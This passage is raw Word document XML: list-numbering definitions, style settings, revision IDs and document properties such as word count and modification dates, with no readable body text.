      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C8588DA4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="389C0B52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BC42AE9A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EC74A1B2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1B71035F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF10E8CE"/>
    <w:lvl w:ilvl="0" w:tplc="CEE6DF64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A51CA330">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E926F012">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9F064198">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D828FCEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B3CC0746">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7646E72C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="45D6729C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6A606062">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FE41206"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23F6D9FC"/>
    <w:lvl w:ilvl="0" w:tplc="1AE41B80">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7FBA68FE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="38C2D0C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="022E0AE6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="83F01A4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="44468D30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E83CD826">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BC3CDE84">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="11240BA8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5DB4063E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="538478F4"/>
    <w:lvl w:ilvl="0" w:tplc="A58EAC88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="474C88AE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EF1EFA4E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0A56CD3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="27C64BE4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E2A09742">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3CA61748">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AE209E52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2CAA022E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="721C5B0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DCA4A2E"/>
    <w:lvl w:ilvl="0" w:tplc="23A8546C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="083E99D6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="27207B26">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FD5433A4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9BCC8BAC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CBFAE04E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CCE87AEE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5A722FD6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7982F5E4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>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0"/>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FC0"/>
    <w:rsid w:val="002C24B3"/>
    <w:rsid w:val="002E0D2F"/>
    <w:rsid w:val="004E1C77"/>
    <w:rsid w:val="005976CA"/>
    <w:rsid w:val="007B6FC0"/>
    <w:rsid w:val="00A410FE"/>
    <w:rsid w:val="00E77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37EFA"/>
  <w15:docId w15:val="{4440822B-630F-4617-B683-34DCCB03E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rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="24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1075</Words>
  <Characters>6130</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>51</Lines>
  <Paragraphs>14</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trung nguyen</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-14T11:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-14T11:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>